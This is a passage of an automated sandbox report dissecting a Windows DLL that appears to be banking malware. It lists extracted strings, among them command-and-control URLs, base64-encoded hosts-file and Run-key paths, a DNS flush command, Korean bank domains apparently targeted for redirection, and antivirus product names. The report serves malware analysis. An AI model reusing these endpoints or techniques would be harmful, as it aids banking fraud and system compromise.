                                                                                                                                                                          • Associated: 0000000B.00000002.1845746204.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845774606.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845801324.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845844288.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845884030.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845920656.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845952383.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845988630.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846020996.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846046754.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846076785.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitVariant
                                                                                                                                                                          • String ID: CommandLine$Name$ProcessID$SELECT * FROM $WQL$p=Vu$svchost.exe$svchost.exe -k NetworkService
                                                                                                                                                                          • API String ID: 1927566239-3240772352
                                                                                                                                                                          • Opcode ID: 809660576abba3bc831f7d966f247150da8ea1521fee35fef51387eeb5a2eb78
                                                                                                                                                                          • Instruction ID: 9d9a7b9c9ad05fb17601a1e21a41dbb997ac73afb50a28aca2ce94161bb16792
                                                                                                                                                                          • Opcode Fuzzy Hash: 809660576abba3bc831f7d966f247150da8ea1521fee35fef51387eeb5a2eb78
                                                                                                                                                                          • Instruction Fuzzy Hash: 2AA14AB5900209AFEB04DFA4CC81DEEBBB8FF48394F104569F515AB294CB31AE45CB60
                                                                                                                                                                          Function 1000828F Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 144librarysleepCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          • XGRyaXZlcnNcZXRjXGhvc3Rz, xrefs: 100082E8
                                                                                                                                                                          • 127.0.0.1, xrefs: 10008417
                                                                                                                                                                          • http://107.163.56.232:18963/main.php, xrefs: 10008376
                                                                                                                                                                          • XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==, xrefs: 100082FF
                                                                                                                                                                          • 8.8.8.8, xrefs: 10008412
                                                                                                                                                                          • Y21kLmV4ZSAvYyBpcGNvbmZpZyAvZmx1c2hkbnM=, xrefs: 10008428
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 0000000B.00000002.1845680236.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845746204.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845774606.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845801324.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845844288.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845884030.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845920656.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845952383.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845988630.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846020996.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846046754.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846076785.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk$Sleepwsprintf
                                                                                                                                                                          • String ID: 127.0.0.1$8.8.8.8$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$Y21kLmV4ZSAvYyBpcGNvbmZpZyAvZmx1c2hkbnM=$http://107.163.56.232:18963/main.php
                                                                                                                                                                          • API String ID: 2795264321-515792873
                                                                                                                                                                          • Opcode ID: 512cc08456b3741649836ced6ecb96ad062b60418455557be70083cdc6fec90e
                                                                                                                                                                          • Instruction ID: 8dd24be72779d1db326892d4824c811f5291eb1f4f1f793922e2c79d5d000f77
                                                                                                                                                                          • Opcode Fuzzy Hash: 512cc08456b3741649836ced6ecb96ad062b60418455557be70083cdc6fec90e
                                                                                                                                                                          • Instruction Fuzzy Hash: A44109B6D0425976FB21D364CC56FCF7B6CEB44280F2045A5F248BA086DAB4AB844F55
                                                                                                                                                                          Function 1000599B Relevance: 15.1, APIs: 4, Strings: 6, Instructions: 83COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 0000000B.00000002.1845680236.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845746204.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845774606.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845801324.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845844288.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845884030.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845920656.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845952383.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845988630.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846020996.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846046754.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846076785.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: wsprintf
                                                                                                                                                                          • String ID: %s\%s$%s\version.txt$107.163.56.251:6658$12091507$F896SD5DAE$M%s
                                                                                                                                                                          • API String ID: 2111968516-1696321353
                                                                                                                                                                          • Opcode ID: c5f75ce024e5877d67f2cb652d7117067222741117a7b19a033c173ca86ea290
                                                                                                                                                                          • Instruction ID: 2c0e65cf9d0f003dd0541039253934f55528cad486157ddc35f7c3791a233049
                                                                                                                                                                          • Opcode Fuzzy Hash: c5f75ce024e5877d67f2cb652d7117067222741117a7b19a033c173ca86ea290
                                                                                                                                                                          • Instruction Fuzzy Hash: 1C1127756007587BF210E7619C85F5F7E5CDF896EAF01012AF6049E181DB76EC808672
                                                                                                                                                                          Function 100064AB Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 271timeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • wsprintfA.USER32 ref: 10006509
                                                                                                                                                                            • Part of subcall function 10003F0A: InternetOpenA.WININET(7A4A585A,30564758,6C773159,6A567959,754D574A), ref: 10003F1C
                                                                                                                                                                          • ___crtGetTimeFormatEx.LIBCMT ref: 10006558
                                                                                                                                                                            • Part of subcall function 10003F24: InternetOpenUrlA.WININET(326C6D63,7A4A585A,30564758,6C773159,6A567959,754D574A), ref: 10003F39
                                                                                                                                                                            • Part of subcall function 10003F41: InternetReadFile.WININET(?,?,?,?), ref: 10003F51
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,10017BAC,10017BAC,00000000,00000000), ref: 100065DA
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,?,?,?,10017BAC,10017BAC,00000000,00000000), ref: 100065F8
                                                                                                                                                                          • wsprintfA.USER32 ref: 100066FB
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 0000000B.00000002.1845680236.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845746204.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845774606.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845801324.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845844288.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845884030.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845920656.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845952383.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845988630.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846020996.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846046754.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846076785.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Internet$ByteCharMultiOpenWidewsprintf$FileFormatReadTime___crt
                                                                                                                                                                          • String ID: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)$aHR0cDovL2Jsb2cuc2luYS5jb20uY24vdS8lcw==$title
                                                                                                                                                                          • API String ID: 4077377486-2496724313
                                                                                                                                                                          • Opcode ID: e79b2397f523602102f35c8e943bcf73ee5fa89f46c403d07051b887daff97a9
                                                                                                                                                                          • Instruction ID: 293d0e7632e531392dd0fb5c2f77952c0a17312896667c4884a995f19a9271bc
                                                                                                                                                                          • Opcode Fuzzy Hash: e79b2397f523602102f35c8e943bcf73ee5fa89f46c403d07051b887daff97a9
                                                                                                                                                                          • Instruction Fuzzy Hash: 2C81D6B6C04249BEFB01DBA4DC81EEF7B7DEF09394F244166F505A6186DA316E4087B1
                                                                                                                                                                          Function 10005DC6 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 113timeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___crtGetTimeFormatEx.LIBCMT ref: 10005E23
                                                                                                                                                                            • Part of subcall function 1000409D: RegQueryValueExA.ADVAPI32(?,?,?,?,?,?), ref: 100040B2
                                                                                                                                                                            • Part of subcall function 10004092: RegCloseKey.ADVAPI32(?,10005E30,?,?,ProcessorNameString,00000000,00000004,?,?,80000002,?,00000000,000F003F,?), ref: 10004096
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 0000000B.00000002.1845680236.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845746204.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845774606.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845801324.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845844288.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845884030.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845920656.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845952383.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845988630.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846020996.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846046754.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846076785.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseFormatQueryTimeValue___crt
                                                                                                                                                                          • String ID: %u MB$12091507$@$Find CPU Error$HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString$http://107.163.56.232:18963/main.php
                                                                                                                                                                          • API String ID: 271660946-2089455369
                                                                                                                                                                          • Opcode ID: 95e223ab5f4cfbec46ff1c7f404cd97cebc2f8f8b6b247623b971e73518f697e
                                                                                                                                                                          • Instruction ID: c0ffa68043a95791f02fd04d8c4918fc6d3fd57fe225104bb55dd78593dce371
                                                                                                                                                                          • Opcode Fuzzy Hash: 95e223ab5f4cfbec46ff1c7f404cd97cebc2f8f8b6b247623b971e73518f697e
                                                                                                                                                                          • Instruction Fuzzy Hash: CB31C3B680460DBAEB11CB60DC46FDF77ACEF04351F54406AF644AB182EB35BB448B95
                                                                                                                                                                          Function 10006021 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 96libraryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 0000000B.00000002.1845680236.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845746204.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845774606.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845801324.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845844288.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845884030.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845920656.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845952383.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845988630.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846020996.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846046754.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846076785.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID: GetUrlCacheEntryInfoA$URLDownloadToCacheFileA$urlmon.dll$wininet.dll
                                                                                                                                                                          • API String ID: 2994545307-2475139894
                                                                                                                                                                          • Opcode ID: 58e32ecd4df237d1f6062f21ac533755852c5572bebf91a7140361dded5085fe
                                                                                                                                                                          • Instruction ID: 07a37e4b5f5db9f07829dfdfef9d508389309d866dd02fd17ced75df8caaf776
                                                                                                                                                                          • Opcode Fuzzy Hash: 58e32ecd4df237d1f6062f21ac533755852c5572bebf91a7140361dded5085fe
                                                                                                                                                                          • Instruction Fuzzy Hash: 72313EB690461CBEEB11DBA4CC45FEF7B7DEB08341F5400A6F608AB181D7759A448EA0
                                                                                                                                                                          Function 10004921 Relevance: 12.3, APIs: 2, Strings: 6, Instructions: 337sleepCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • Sleep.KERNEL32(?,00000000,00000001,00000000,00000000,?), ref: 10004A3A
                                                                                                                                                                          • wsprintfA.USER32 ref: 10004ADB
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 0000000B.00000002.1845680236.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845746204.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845774606.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845801324.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845844288.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845884030.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845920656.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845952383.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845988630.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846020996.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846046754.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846076785.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleepwsprintf
                                                                                                                                                                          • String ID: %s|$127.0.0.1$8.8.8.8$ahnlab$alyac$v3lite
                                                                                                                                                                          • API String ID: 1749205058-4002687564
                                                                                                                                                                          • Opcode ID: a59fa5bbbfeca0813ebf207540be2f8e1c24db24c18423e471c4f08bbbb05ee2
                                                                                                                                                                          • Instruction ID: 59076712db6477dadbaa6102d4b2767c56af3142dc1d583c19f1c191fca588aa
                                                                                                                                                                          • Opcode Fuzzy Hash: a59fa5bbbfeca0813ebf207540be2f8e1c24db24c18423e471c4f08bbbb05ee2
                                                                                                                                                                          • Instruction Fuzzy Hash: 97B16CB2D0025CAAEB11DBE4CC85EDFBBBCEB45740F0045A6F205A6141EA71AB45CF61
                                                                                                                                                                          Function 10006D1A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 72timeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 10003FF7: GetShortPathNameA.KERNEL32(?,?,?), ref: 10004003
                                                                                                                                                                            • Part of subcall function 1000406C: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 1000408A
                                                                                                                                                                          • wsprintfA.USER32 ref: 10006DAB
                                                                                                                                                                          • ___crtGetTimeFormatEx.LIBCMT ref: 10006DD1
                                                                                                                                                                            • Part of subcall function 100040D4: RegSetValueExA.ADVAPI32(?,?,?,?,?,?), ref: 100040E9
                                                                                                                                                                            • Part of subcall function 10004092: RegCloseKey.ADVAPI32(?,10005E30,?,?,ProcessorNameString,00000000,00000004,?,?,80000002,?,00000000,000F003F,?), ref: 10004096
                                                                                                                                                                          Strings
                                                                                                                                                                          • REG_SZ, xrefs: 10006D67
                                                                                                                                                                          • U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==, xrefs: 10006D6D
                                                                                                                                                                          • %s "%s",ClassObject, xrefs: 10006DA5
                                                                                                                                                                          • COAPI, xrefs: 10006DC9
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 0000000B.00000002.1845680236.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845746204.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845774606.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845801324.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845844288.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845884030.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845920656.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845952383.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845988630.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846020996.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846046754.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846076785.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseCreateFormatNamePathShortTimeValue___crtwsprintf
                                                                                                                                                                          • String ID: %s "%s",ClassObject$COAPI$REG_SZ$U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==
                                                                                                                                                                          • API String ID: 1762869224-2622945652
                                                                                                                                                                          • Opcode ID: fbfcc2b6831f484961dad07c1014c2de558b5a5ead880f6592c8572077f3b4ee
                                                                                                                                                                          • Instruction ID: 1af9319de0d48fb467b647ae3650b89cedd961ef50c791020d1a6b5894edbf87
                                                                                                                                                                          • Opcode Fuzzy Hash: fbfcc2b6831f484961dad07c1014c2de558b5a5ead880f6592c8572077f3b4ee
                                                                                                                                                                          • Instruction Fuzzy Hash: BA11B2B694411CBEFB11D3A4DC86FEA776CDB14380F1004A1F744B9085EAB16FC88AA4
                                                                                                                                                                          Function 1000532A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 53libraryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          • www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.ki|www.knbank.co.kr.ki|openbank.cu.co.kr.ki|www.busanbank.co.kr.ki|www.nonghyup.com.ki|www.shinhan.com.ki|www.wooribank.com.ki|www.hanabank.com.ki|www.epostbank.go.kr.ki|www.ibk.co.kr.ki|www.idk.c, xrefs: 1000534E
                                                                                                                                                                          • , xrefs: 10005394
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 0000000B.00000002.1845680236.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845746204.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845774606.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845801324.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845844288.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845884030.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845920656.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845952383.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845988630.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846020996.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846046754.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846076785.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID: $www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.ki|www.knbank.co.kr.ki|openbank.cu.co.kr.ki|www.busanbank.co.kr.ki|www.nonghyup.com.ki|www.shinhan.com.ki|www.wooribank.com.ki|www.hanabank.com.ki|www.epostbank.go.kr.ki|www.ibk.co.kr.ki|www.idk.c
                                                                                                                                                                          • API String ID: 2994545307-230412946
                                                                                                                                                                          • Opcode ID: 9b1787d2dfbf068aca50b23a22cbcef1ccd3e01471b5ef7f497ffa82660ce614
                                                                                                                                                                          • Instruction ID: 0a715c4d5cc77e21522ecf04e59044d57c4e71f0c84efc3cca746646dee8662b
                                                                                                                                                                          • Opcode Fuzzy Hash: 9b1787d2dfbf068aca50b23a22cbcef1ccd3e01471b5ef7f497ffa82660ce614
                                                                                                                                                                          • Instruction Fuzzy Hash: 8B01D27690431D76EB22EB28CC41FCE7E68EF483C2F0404B5BA496A056D7B1BE805A90
                                                                                                                                                                          Function 1002875F Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 92sleepCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • wsprintfA.USER32 ref: 10008847
                                                                                                                                                                          • Sleep.KERNEL32(000007D0,?,?,00000000), ref: 10008868
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
